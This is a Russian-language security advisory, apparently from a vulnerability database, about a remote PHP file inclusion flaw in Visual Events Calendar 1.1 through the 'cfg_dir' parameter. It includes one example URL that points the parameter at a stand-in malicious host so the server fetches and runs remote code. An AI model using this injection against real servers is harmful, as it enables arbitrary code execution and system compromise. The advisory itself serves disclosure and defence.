PHP-инклюдинг в Visual Events Calendar

Дата публикации:
14.08.2006
Дата изменения:
17.10.2006
Всего просмотров:
3071
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Visual Events Calendar 1.x
Уязвимые версии: Visual Events Calendar 1.1, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "cfg_dir" в сценарии calendar.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://www.site.com/[path]/calendar.php?cfg_dir=http://evil_scripts?

URL производителя: www.web-scripts.biz/calendar.php

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Visual Events Calendar v1.1 (cfg_dir) Remote Inclusion Vulnerability

или введите имя

CAPTCHA